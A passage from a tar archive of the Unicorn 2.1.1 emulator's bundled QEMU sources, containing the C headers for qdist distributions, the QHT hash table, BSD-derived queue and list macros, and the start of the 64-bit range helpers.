/* QEMU_PROCESSOR_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/qdist.h�������������������������������������������������������������0000664�0000000�0000000�00000003263�14675241067�0020046�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (C) 2016, Emilio G. Cota <cota@braap.org> * * License: GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef QEMU_QDIST_H #define QEMU_QDIST_H #include "qemu/bitops.h" /* * Samples with the same 'x value' end up in the same qdist_entry, * e.g. inc(0.1) and inc(0.1) end up as {x=0.1, count=2}. * * Binning happens only at print time, so that we retain the flexibility to * choose the binning. This might not be ideal for workloads that do not care * much about precision and insert many samples all with different x values; * in that case, pre-binning (e.g. entering both 0.115 and 0.097 as 0.1) * should be considered. */ struct qdist_entry { double x; unsigned long count; }; struct qdist { struct qdist_entry *entries; size_t n; size_t size; }; #define QDIST_PR_BORDER BIT(0) #define QDIST_PR_LABELS BIT(1) /* the remaining options only work if PR_LABELS is set */ #define QDIST_PR_NODECIMAL BIT(2) #define QDIST_PR_PERCENT BIT(3) #define QDIST_PR_100X BIT(4) #define QDIST_PR_NOBINRANGE BIT(5) void qdist_init(struct qdist *dist); void qdist_destroy(struct qdist *dist); void qdist_add(struct qdist *dist, double x, long count); void qdist_inc(struct qdist *dist, double x); double qdist_xmin(const struct qdist *dist); double qdist_xmax(const struct qdist *dist); double qdist_avg(const struct qdist *dist); unsigned long qdist_sample_count(const struct qdist *dist); size_t qdist_unique_entries(const struct qdist *dist); /* Only qdist code and test code should ever call this function */ void qdist_bin__internal(struct qdist *to, const struct qdist *from, size_t n); #endif /* QEMU_QDIST_H */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/qht.h���������������������������������������������������������������0000664�0000000�0000000�00000016621�14675241067�0017520�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (C) 2016, Emilio G. Cota <cota@braap.org> * * License: GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef QEMU_QHT_H #define QEMU_QHT_H // #include "qemu/seqlock.h" #include "qemu/thread.h" #include "qemu/qdist.h" struct uc_struct; typedef bool (*qht_cmp_func_t)(struct uc_struct *uc, const void *a, const void *b); struct qht { struct qht_map *map; qht_cmp_func_t cmp; unsigned int mode; }; /** * struct qht_stats - Statistics of a QHT * @head_buckets: number of head buckets * @used_head_buckets: number of non-empty head buckets * @entries: total number of entries * @chain: frequency distribution representing the number of buckets in each * chain, excluding empty chains. * @occupancy: frequency distribution representing chain occupancy rate. * Valid range: from 0.0 (empty) to 1.0 (full occupancy). * * An entry is a pointer-hash pair. * Each bucket can host several entries. * Chains are chains of buckets, whose first link is always a head bucket. */ struct qht_stats { size_t head_buckets; size_t used_head_buckets; size_t entries; struct qdist chain; struct qdist occupancy; }; typedef bool (*qht_lookup_func_t)(struct uc_struct *uc, const void *obj, const void *userp); typedef void (*qht_iter_func_t)(struct uc_struct *uc, void *p, uint32_t h, void *up); typedef bool (*qht_iter_bool_func_t)(void *p, uint32_t h, void *up); #define QHT_MODE_AUTO_RESIZE 0x1 /* auto-resize when heavily loaded */ #define QHT_MODE_RAW_MUTEXES 0x2 /* bypass the profiler (QSP) */ /** * qht_init - Initialize a QHT * @ht: QHT to be initialized * @cmp: default comparison function. Cannot be NULL. * @n_elems: number of entries the hash table should be optimized for. * @mode: bitmask with OR'ed QHT_MODE_* */ void qht_init(struct qht *ht, qht_cmp_func_t cmp, size_t n_elems, unsigned int mode); /** * qht_destroy - destroy a previously initialized QHT * @ht: QHT to be destroyed * * Call only when there are no readers/writers left. */ void qht_destroy(struct qht *ht); /** * qht_insert - Insert a pointer into the hash table * @ht: QHT to insert to * @p: pointer to be inserted * @hash: hash corresponding to @p * @existing: address where the pointer to an existing entry can be copied to * * Attempting to insert a NULL @p is a bug. * Inserting the same pointer @p with different @hash values is a bug. * * In case of successful operation, smp_wmb() is implied before the pointer is * inserted into the hash table. * * Returns true on success. * Returns false if there is an existing entry in the table that is equivalent * (i.e. ht->cmp matches and the hash is the same) to @p-@h. If @existing * is !NULL, a pointer to this existing entry is copied to it. */ bool qht_insert(struct uc_struct *uc, struct qht *ht, void *p, uint32_t hash, void **existing); /** * qht_lookup_custom - Look up a pointer using a custom comparison function. * @ht: QHT to be looked up * @userp: pointer to pass to @func * @hash: hash of the pointer to be looked up * @func: function to compare existing pointers against @userp * * Needs to be called under an RCU read-critical section. * * smp_read_barrier_depends() is implied before the call to @func. * * The user-provided @func compares pointers in QHT against @userp. * If the function returns true, a match has been found. * * Returns the corresponding pointer when a match is found. * Returns NULL otherwise. */ void *qht_lookup_custom(struct uc_struct *uc, const struct qht *ht, const void *userp, uint32_t hash, qht_lookup_func_t func); /** * qht_lookup - Look up a pointer in a QHT * @ht: QHT to be looked up * @userp: pointer to pass to the comparison function * @hash: hash of the pointer to be looked up * * Calls qht_lookup_custom() using @ht's default comparison function. */ void *qht_lookup(struct uc_struct *uc, const struct qht *ht, const void *userp, uint32_t hash); /** * qht_remove - remove a pointer from the hash table * @ht: QHT to remove from * @p: pointer to be removed * @hash: hash corresponding to @p * * Attempting to remove a NULL @p is a bug. * * Just-removed @p pointers cannot be immediately freed; they need to remain * valid until the end of the RCU grace period in which qht_remove() is called. * This guarantees that concurrent lookups will always compare against valid * data. * * Returns true on success. * Returns false if the @p-@hash pair was not found. */ bool qht_remove(struct qht *ht, const void *p, uint32_t hash); /** * qht_reset - reset a QHT * @ht: QHT to be reset * * All entries in the hash table are reset. No resizing is performed. * * If concurrent readers may exist, the objects pointed to by the hash table * must remain valid for the existing RCU grace period -- see qht_remove(). * See also: qht_reset_size() */ void qht_reset(struct qht *ht); /** * qht_reset_size - reset and resize a QHT * @ht: QHT to be reset and resized * @n_elems: number of entries the resized hash table should be optimized for. * * Returns true if the resize was necessary and therefore performed. * Returns false otherwise. * * If concurrent readers may exist, the objects pointed to by the hash table * must remain valid for the existing RCU grace period -- see qht_remove(). * See also: qht_reset(), qht_resize(). */ bool qht_reset_size(struct uc_struct *uc, struct qht *ht, size_t n_elems); /** * qht_resize - resize a QHT * @ht: QHT to be resized * @n_elems: number of entries the resized hash table should be optimized for * * Returns true on success. * Returns false if the resize was not necessary and therefore not performed. * See also: qht_reset_size(). */ bool qht_resize(struct uc_struct *uc, struct qht *ht, size_t n_elems); /** * qht_iter - Iterate over a QHT * @ht: QHT to be iterated over * @func: function to be called for each entry in QHT * @userp: additional pointer to be passed to @func * * Each time it is called, user-provided @func is passed a pointer-hash pair, * plus @userp. * * Note: @ht cannot be accessed from @func * See also: qht_iter_remove() */ void qht_iter(struct uc_struct *uc, struct qht *ht, qht_iter_func_t func, void *userp); /** * qht_iter_remove - Iterate over a QHT, optionally removing entries * @ht: QHT to be iterated over * @func: function to be called for each entry in QHT * @userp: additional pointer to be passed to @func * * Each time it is called, user-provided @func is passed a pointer-hash pair, * plus @userp. If @func returns true, the pointer-hash pair is removed. * * Note: @ht cannot be accessed from @func * See also: qht_iter() */ void qht_iter_remove(struct uc_struct *uc, struct qht *ht, qht_iter_bool_func_t func, void *userp); /** * qht_statistics_init - Gather statistics from a QHT * @ht: QHT to gather statistics from * @stats: pointer to a &struct qht_stats to be filled in * * Does NOT need to be called under an RCU read-critical section, * since it does not dereference any pointers stored in the hash table. * * When done with @stats, pass the struct to qht_statistics_destroy(). * Failing to do this will leak memory. */ void qht_statistics_init(const struct qht *ht, struct qht_stats *stats); /** * qht_statistics_destroy - Destroy a &struct qht_stats * @stats: &struct qht_stats to be destroyed * * See also: qht_statistics_init(). */ void qht_statistics_destroy(struct qht_stats *stats); #endif /* QEMU_QHT_H */ ���������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/queue.h�������������������������������������������������������������0000664�0000000�0000000�00000071356�14675241067�0020056�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* $NetBSD: queue.h,v 1.52 2009/04/20 09:56:08 mschuett Exp $ */ /* * QEMU version: Copy from netbsd, removed debug code, removed some of * the implementations. Left in singly-linked lists, lists, simple * queues, and tail queues. */ /* * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)queue.h 8.5 (Berkeley) 8/20/94 */ #ifndef QEMU_SYS_QUEUE_H #define QEMU_SYS_QUEUE_H /* * This file defines four types of data structures: singly-linked lists, * lists, simple queues, and tail queues. * * A singly-linked list is headed by a single forward pointer. The * elements are singly linked for minimum space and pointer manipulation * overhead at the expense of O(n) removal for arbitrary elements. New * elements can be added to the list after an existing element or at the * head of the list. Elements being removed from the head of the list * should use the explicit macro for this purpose for optimum * efficiency. A singly-linked list may only be traversed in the forward * direction. Singly-linked lists are ideal for applications with large * datasets and few or no removals or for implementing a LIFO queue. * * A list is headed by a single forward pointer (or an array of forward * pointers for a hash table header). The elements are doubly linked * so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before * or after an existing element or at the head of the list. A list * may only be traversed in the forward direction. * * A simple queue is headed by a pair of pointers, one the head of the * list and the other to the tail of the list. The elements are singly * linked to save space, so elements can only be removed from the * head of the list. New elements can be added to the list after * an existing element, at the head of the list, or at the end of the * list. A simple queue may only be traversed in the forward direction. * * A tail queue is headed by a pair of pointers, one to the head of the * list and the other to the tail of the list. The elements are doubly * linked so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before or * after an existing element, at the head of the list, or at the end of * the list. A tail queue may be traversed in either direction. * * For details on the use of these macros, see the queue(3) manual page. */ /* * List definitions. */ #define QLIST_HEAD(name, type) \ struct name { \ struct type *lh_first; /* first element */ \ } #define QLIST_HEAD_INITIALIZER(head) \ { NULL } #define QLIST_ENTRY(type) \ struct { \ struct type *le_next; /* next element */ \ struct type **le_prev; /* address of previous next element */ \ } /* * List functions. */ #define QLIST_INIT(head) do { \ (head)->lh_first = NULL; \ } while (/*CONSTCOND*/0) #define QLIST_SWAP(dstlist, srclist, field) do { \ void *tmplist; \ tmplist = (srclist)->lh_first; \ (srclist)->lh_first = (dstlist)->lh_first; \ if ((srclist)->lh_first != NULL) { \ (srclist)->lh_first->field.le_prev = &(srclist)->lh_first; \ } \ (dstlist)->lh_first = tmplist; \ if ((dstlist)->lh_first != NULL) { \ (dstlist)->lh_first->field.le_prev = &(dstlist)->lh_first; \ } \ } while (/*CONSTCOND*/0) #define QLIST_INSERT_AFTER(listelm, elm, field) do { \ if (((elm)->field.le_next = (listelm)->field.le_next) != NULL) \ (listelm)->field.le_next->field.le_prev = \ &(elm)->field.le_next; \ (listelm)->field.le_next = (elm); \ (elm)->field.le_prev = &(listelm)->field.le_next; \ } while (/*CONSTCOND*/0) #define QLIST_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.le_prev = (listelm)->field.le_prev; \ (elm)->field.le_next = (listelm); \ *(listelm)->field.le_prev = (elm); \ (listelm)->field.le_prev = &(elm)->field.le_next; \ } while (/*CONSTCOND*/0) #define QLIST_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.le_next = (head)->lh_first) != NULL) \ (head)->lh_first->field.le_prev = &(elm)->field.le_next;\ (head)->lh_first = (elm); \ (elm)->field.le_prev = &(head)->lh_first; \ } while (/*CONSTCOND*/0) #define QLIST_REMOVE(elm, field) do { \ if ((elm)->field.le_next != NULL) \ (elm)->field.le_next->field.le_prev = \ (elm)->field.le_prev; \ *(elm)->field.le_prev = (elm)->field.le_next; \ (elm)->field.le_next = NULL; \ (elm)->field.le_prev = NULL; \ } while (/*CONSTCOND*/0) /* * Like QLIST_REMOVE() but safe to call when elm is not in a list */ #define QLIST_SAFE_REMOVE(elm, field) do { \ if ((elm)->field.le_prev != NULL) { \ if ((elm)->field.le_next != NULL) \ (elm)->field.le_next->field.le_prev = \ (elm)->field.le_prev; \ *(elm)->field.le_prev = (elm)->field.le_next; \ (elm)->field.le_next = NULL; \ (elm)->field.le_prev = NULL; \ } \ } while (/*CONSTCOND*/0) /* Is elm in a list? */ #define QLIST_IS_INSERTED(elm, field) ((elm)->field.le_prev != NULL) #define QLIST_FOREACH(var, head, field) \ for ((var) = ((head)->lh_first); \ (var); \ (var) = ((var)->field.le_next)) #define QLIST_FOREACH_SAFE(var, head, field, next_var) \ for ((var) = ((head)->lh_first); \ (var) && ((next_var) = ((var)->field.le_next), 1); \ (var) = (next_var)) /* * List access methods. */ #define QLIST_EMPTY(head) ((head)->lh_first == NULL) #define QLIST_FIRST(head) ((head)->lh_first) #define QLIST_NEXT(elm, field) ((elm)->field.le_next) /* * Singly-linked List definitions. */ #define QSLIST_HEAD(name, type) \ struct name { \ struct type *slh_first; /* first element */ \ } #define QSLIST_HEAD_INITIALIZER(head) \ { NULL } #define QSLIST_ENTRY(type) \ struct { \ struct type *sle_next; /* next element */ \ } /* * Singly-linked List functions. */ #define QSLIST_INIT(head) do { \ (head)->slh_first = NULL; \ } while (/*CONSTCOND*/0) #define QSLIST_INSERT_AFTER(slistelm, elm, field) do { \ (elm)->field.sle_next = (slistelm)->field.sle_next; \ (slistelm)->field.sle_next = (elm); \ } while (/*CONSTCOND*/0) #define QSLIST_INSERT_HEAD(head, elm, field) do { \ (elm)->field.sle_next = (head)->slh_first; \ (head)->slh_first = (elm); \ } while (/*CONSTCOND*/0) #define QSLIST_INSERT_HEAD_ATOMIC(head, elm, field) do { \ typeof(elm) save_sle_next; \ do { \ save_sle_next = (elm)->field.sle_next = (head)->slh_first; \ } while (atomic_cmpxchg(&(head)->slh_first, save_sle_next, (elm)) != \ save_sle_next); \ } while (/*CONSTCOND*/0) #define QSLIST_MOVE_ATOMIC(dest, src) do { \ (dest)->slh_first = atomic_xchg(&(src)->slh_first, NULL); \ } while (/*CONSTCOND*/0) #define QSLIST_REMOVE_HEAD(head, field) do { \ typeof((head)->slh_first) elm = (head)->slh_first; \ (head)->slh_first = elm->field.sle_next; \ elm->field.sle_next = NULL; \ } while (/*CONSTCOND*/0) #define QSLIST_REMOVE_AFTER(slistelm, field) do { \ typeof(slistelm) next = (slistelm)->field.sle_next; \ (slistelm)->field.sle_next = next->field.sle_next; \ next->field.sle_next = NULL; \ } while (/*CONSTCOND*/0) #define QSLIST_REMOVE(head, elm, type, field) do { \ if ((head)->slh_first == (elm)) { \ QSLIST_REMOVE_HEAD((head), field); \ } else { \ struct type *curelm = (head)->slh_first; \ while (curelm->field.sle_next != (elm)) \ curelm = curelm->field.sle_next; \ curelm->field.sle_next = curelm->field.sle_next->field.sle_next; \ (elm)->field.sle_next = NULL; \ } \ } while (/*CONSTCOND*/0) #define QSLIST_FOREACH(var, head, field) \ for((var) = (head)->slh_first; (var); (var) = (var)->field.sle_next) #define QSLIST_FOREACH_SAFE(var, head, field, tvar) \ for ((var) = QSLIST_FIRST((head)); \ (var) && ((tvar) = QSLIST_NEXT((var), field), 1); \ (var) = (tvar)) /* * Singly-linked List access methods. */ #define QSLIST_EMPTY(head) ((head)->slh_first == NULL) #define QSLIST_FIRST(head) ((head)->slh_first) #define QSLIST_NEXT(elm, field) ((elm)->field.sle_next) /* * Simple queue definitions. */ #define QSIMPLEQ_HEAD(name, type) \ struct name { \ struct type *sqh_first; /* first element */ \ struct type **sqh_last; /* addr of last next element */ \ } #define QSIMPLEQ_HEAD_INITIALIZER(head) \ { NULL, &(head).sqh_first } #define QSIMPLEQ_ENTRY(type) \ struct { \ struct type *sqe_next; /* next element */ \ } /* * Simple queue functions. */ #define QSIMPLEQ_INIT(head) do { \ (head)->sqh_first = NULL; \ (head)->sqh_last = &(head)->sqh_first; \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.sqe_next = (head)->sqh_first) == NULL) \ (head)->sqh_last = &(elm)->field.sqe_next; \ (head)->sqh_first = (elm); \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.sqe_next = NULL; \ *(head)->sqh_last = (elm); \ (head)->sqh_last = &(elm)->field.sqe_next; \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.sqe_next = (listelm)->field.sqe_next) == NULL) \ (head)->sqh_last = &(elm)->field.sqe_next; \ (listelm)->field.sqe_next = (elm); \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_REMOVE_HEAD(head, field) do { \ typeof((head)->sqh_first) elm = (head)->sqh_first; \ if (((head)->sqh_first = elm->field.sqe_next) == NULL) \ (head)->sqh_last = &(head)->sqh_first; \ elm->field.sqe_next = NULL; \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_SPLIT_AFTER(head, elm, field, removed) do { \ QSIMPLEQ_INIT(removed); \ if (((removed)->sqh_first = (head)->sqh_first) != NULL) { \ if (((head)->sqh_first = (elm)->field.sqe_next) == NULL) { \ (head)->sqh_last = &(head)->sqh_first; \ } \ (removed)->sqh_last = &(elm)->field.sqe_next; \ (elm)->field.sqe_next = NULL; \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_REMOVE(head, elm, type, field) do { \ if ((head)->sqh_first == (elm)) { \ QSIMPLEQ_REMOVE_HEAD((head), field); \ } else { \ struct type *curelm = (head)->sqh_first; \ while (curelm->field.sqe_next != (elm)) \ curelm = curelm->field.sqe_next; \ if ((curelm->field.sqe_next = \ curelm->field.sqe_next->field.sqe_next) == NULL) \ (head)->sqh_last = &(curelm)->field.sqe_next; \ (elm)->field.sqe_next = NULL; \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_FOREACH(var, head, field) \ for ((var) = ((head)->sqh_first); \ (var); \ (var) = ((var)->field.sqe_next)) #define QSIMPLEQ_FOREACH_SAFE(var, head, field, next) \ for ((var) = ((head)->sqh_first); \ (var) && ((next = ((var)->field.sqe_next)), 1); \ (var) = (next)) #define QSIMPLEQ_CONCAT(head1, head2) do { \ if (!QSIMPLEQ_EMPTY((head2))) { \ *(head1)->sqh_last = (head2)->sqh_first; \ (head1)->sqh_last = (head2)->sqh_last; \ QSIMPLEQ_INIT((head2)); \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_PREPEND(head1, head2) do { \ if (!QSIMPLEQ_EMPTY((head2))) { \ *(head2)->sqh_last = (head1)->sqh_first; \ (head1)->sqh_first = (head2)->sqh_first; \ QSIMPLEQ_INIT((head2)); \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_LAST(head, type, field) \ (QSIMPLEQ_EMPTY((head)) ? \ NULL : \ ((struct type *)(void *) \ ((char *)((head)->sqh_last) - offsetof(struct type, field)))) /* * Simple queue access methods. */ #define QSIMPLEQ_EMPTY_ATOMIC(head) (atomic_read(&((head)->sqh_first)) == NULL) #define QSIMPLEQ_EMPTY(head) ((head)->sqh_first == NULL) #define QSIMPLEQ_FIRST(head) ((head)->sqh_first) #define QSIMPLEQ_NEXT(elm, field) ((elm)->field.sqe_next) typedef struct QTailQLink { void *tql_next; struct QTailQLink *tql_prev; } QTailQLink; /* * Tail queue definitions. The union acts as a poor man template, as if * it were QTailQLink<type>. */ #define QTAILQ_HEAD(name, type) \ union name { \ struct type *tqh_first; /* first element */ \ QTailQLink tqh_circ; /* link for circular backwards list */ \ } #define QTAILQ_HEAD_INITIALIZER(head) \ { .tqh_circ = { NULL, &(head).tqh_circ } } #define QTAILQ_ENTRY(type) \ union { \ struct type *tqe_next; /* next element */ \ QTailQLink tqe_circ; /* link for circular backwards list */ \ } /* * Tail queue functions. */ #define QTAILQ_INIT(head) do { \ (head)->tqh_first = NULL; \ (head)->tqh_circ.tql_prev = &(head)->tqh_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.tqe_next = (head)->tqh_first) != NULL) \ (head)->tqh_first->field.tqe_circ.tql_prev = \ &(elm)->field.tqe_circ; \ else \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ (head)->tqh_first = (elm); \ (elm)->field.tqe_circ.tql_prev = &(head)->tqh_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.tqe_next = NULL; \ (elm)->field.tqe_circ.tql_prev = (head)->tqh_circ.tql_prev; \ (head)->tqh_circ.tql_prev->tql_next = (elm); \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.tqe_next = (listelm)->field.tqe_next) != NULL)\ (elm)->field.tqe_next->field.tqe_circ.tql_prev = \ &(elm)->field.tqe_circ; \ else \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ (listelm)->field.tqe_next = (elm); \ (elm)->field.tqe_circ.tql_prev = &(listelm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.tqe_circ.tql_prev = (listelm)->field.tqe_circ.tql_prev; \ (elm)->field.tqe_next = (listelm); \ (listelm)->field.tqe_circ.tql_prev->tql_next = (elm); \ (listelm)->field.tqe_circ.tql_prev = &(elm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_REMOVE(head, elm, field) do { \ if (((elm)->field.tqe_next) != NULL) \ (elm)->field.tqe_next->field.tqe_circ.tql_prev = \ (elm)->field.tqe_circ.tql_prev; \ else \ (head)->tqh_circ.tql_prev = (elm)->field.tqe_circ.tql_prev; \ (elm)->field.tqe_circ.tql_prev->tql_next = (elm)->field.tqe_next; \ (elm)->field.tqe_circ.tql_prev = NULL; \ (elm)->field.tqe_circ.tql_next = NULL; \ (elm)->field.tqe_next = NULL; \ } while (/*CONSTCOND*/0) /* remove @left, @right and all elements in between from @head */ #define QTAILQ_REMOVE_SEVERAL(head, left, right, field) do { \ if (((right)->field.tqe_next) != NULL) \ (right)->field.tqe_next->field.tqe_circ.tql_prev = \ (left)->field.tqe_circ.tql_prev; \ else \ (head)->tqh_circ.tql_prev = (left)->field.tqe_circ.tql_prev; \ (left)->field.tqe_circ.tql_prev->tql_next = (right)->field.tqe_next; \ } while (/*CONSTCOND*/0) #define QTAILQ_FOREACH(var, head, field) \ for ((var) = ((head)->tqh_first); \ (var); \ (var) = ((var)->field.tqe_next)) #define QTAILQ_FOREACH_SAFE(var, head, field, next_var) \ for ((var) = ((head)->tqh_first); \ (var) && ((next_var) = ((var)->field.tqe_next), 1); \ (var) = (next_var)) #define QTAILQ_FOREACH_REVERSE(var, head, field) \ for ((var) = QTAILQ_LAST(head); \ (var); \ (var) = QTAILQ_PREV(var, field)) #define QTAILQ_FOREACH_REVERSE_SAFE(var, head, field, prev_var) \ for ((var) = QTAILQ_LAST(head); \ (var) && ((prev_var) = QTAILQ_PREV(var, field), 1); \ (var) = (prev_var)) /* * Tail queue access methods. */ #define QTAILQ_EMPTY(head) ((head)->tqh_first == NULL) #define QTAILQ_FIRST(head) ((head)->tqh_first) #define QTAILQ_NEXT(elm, field) ((elm)->field.tqe_next) #define QTAILQ_IN_USE(elm, field) ((elm)->field.tqe_circ.tql_prev != NULL) #define QTAILQ_LINK_PREV(link) \ ((link).tql_prev->tql_prev->tql_next) #ifndef _MSC_VER #define QTAILQ_LAST(head) \ ((typeof((head)->tqh_first)) QTAILQ_LINK_PREV((head)->tqh_circ)) #define QTAILQ_PREV(elm, field) \ ((typeof((elm)->field.tqe_next)) QTAILQ_LINK_PREV((elm)->field.tqe_circ)) #else #define QTAILQ_LAST(head) \ (QTAILQ_LINK_PREV((head)->tqh_circ)) #define QTAILQ_PREV(elm, field) \ (QTAILQ_LINK_PREV((elm)->field.tqe_circ)) #endif #define field_at_offset(base, offset, type) \ ((type *) (((char *) (base)) + (offset))) /* * Raw access of elements of a tail queue head. Offsets are all zero * because it's a union. */ #define QTAILQ_RAW_FIRST(head) \ field_at_offset(head, 0, void *) #define QTAILQ_RAW_TQH_CIRC(head) \ field_at_offset(head, 0, QTailQLink) /* * Raw access of elements of a tail entry */ #define QTAILQ_RAW_NEXT(elm, entry) \ field_at_offset(elm, entry, void *) #define QTAILQ_RAW_TQE_CIRC(elm, entry) \ field_at_offset(elm, entry, QTailQLink) /* * Tail queue traversal using pointer arithmetic. */ #define QTAILQ_RAW_FOREACH(elm, head, entry) \ for ((elm) = *QTAILQ_RAW_FIRST(head); \ (elm); \ (elm) = *QTAILQ_RAW_NEXT(elm, entry)) /* * Tail queue insertion using pointer arithmetic. */ #define QTAILQ_RAW_INSERT_TAIL(head, elm, entry) do { \ *QTAILQ_RAW_NEXT(elm, entry) = NULL; \ QTAILQ_RAW_TQE_CIRC(elm, entry)->tql_prev = QTAILQ_RAW_TQH_CIRC(head)->tql_prev; \ QTAILQ_RAW_TQH_CIRC(head)->tql_prev->tql_next = (elm); \ QTAILQ_RAW_TQH_CIRC(head)->tql_prev = QTAILQ_RAW_TQE_CIRC(elm, entry); \ } while (/*CONSTCOND*/0) #define QLIST_RAW_FIRST(head) \ field_at_offset(head, 0, void *) #define QLIST_RAW_NEXT(elm, entry) \ field_at_offset(elm, entry, void *) #define QLIST_RAW_PREVIOUS(elm, entry) \ field_at_offset(elm, entry + sizeof(void *), void *) #define QLIST_RAW_FOREACH(elm, head, entry) \ for ((elm) = *QLIST_RAW_FIRST(head); \ (elm); \ (elm) = *QLIST_RAW_NEXT(elm, entry)) #define QLIST_RAW_INSERT_AFTER(head, prev, elem, entry) do { \ *QLIST_RAW_NEXT(prev, entry) = elem; \ *QLIST_RAW_PREVIOUS(elem, entry) = QLIST_RAW_NEXT(prev, entry); \ *QLIST_RAW_NEXT(elem, entry) = NULL; \ } while (0) #define QLIST_RAW_INSERT_HEAD(head, elm, entry) do { \ void *first = *QLIST_RAW_FIRST(head); \ *QLIST_RAW_FIRST(head) = elm; \ *QLIST_RAW_PREVIOUS(elm, entry) = QLIST_RAW_FIRST(head); \ if (first) { \ *QLIST_RAW_NEXT(elm, entry) = first; \ *QLIST_RAW_PREVIOUS(first, entry) = QLIST_RAW_NEXT(elm, entry); \ } else { \ *QLIST_RAW_NEXT(elm, entry) = NULL; \ } \ } while (0) #endif /* QEMU_SYS_QUEUE_H */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/range.h�������������������������������������������������������������0000664�0000000�0000000�00000014000�14675241067�0020005�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU 64-bit address ranges * * Copyright (c) 2015-2016 Red Hat, Inc. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. */ #ifndef QEMU_RANGE_H #define QEMU_RANGE_H /* * Operations on 64 bit address ranges. * Notes: * - Ranges must not wrap around 0, but can include UINT64_MAX. */ struct Range { /* * Do not access members directly, use the functions! * A non-empty range has @lob <= @upb. * An empty range has @lob == @upb + 1. */ uint64_t lob; /* inclusive lower bound */ uint64_t upb; /* inclusive upper bound */ }; static inline void range_invariant(const Range *range) { assert(range->lob <= range->upb || range->lob == range->upb + 1); } /* Compound literal encoding the empty range */ #define range_empty ((Range){ .lob = 1, .upb = 0 }) /* Is @range empty? */ static inline bool range_is_empty(const Range *range) { range_invariant(range); return range->lob > range->upb; } /* Does @range contain @val? */ static inline bool range_contains(const Range *range, uint64_t val) { return val >= range->lob && val <= range->upb; } /* Initialize @range to the empty range */ static inline void range_make_empty(Range *range) { *range = range_empty; assert(range_is_empty(range)); } /* * Initialize @range to span the interval [@lob,@upb]. * Both bounds are inclusive. * The interval must not be 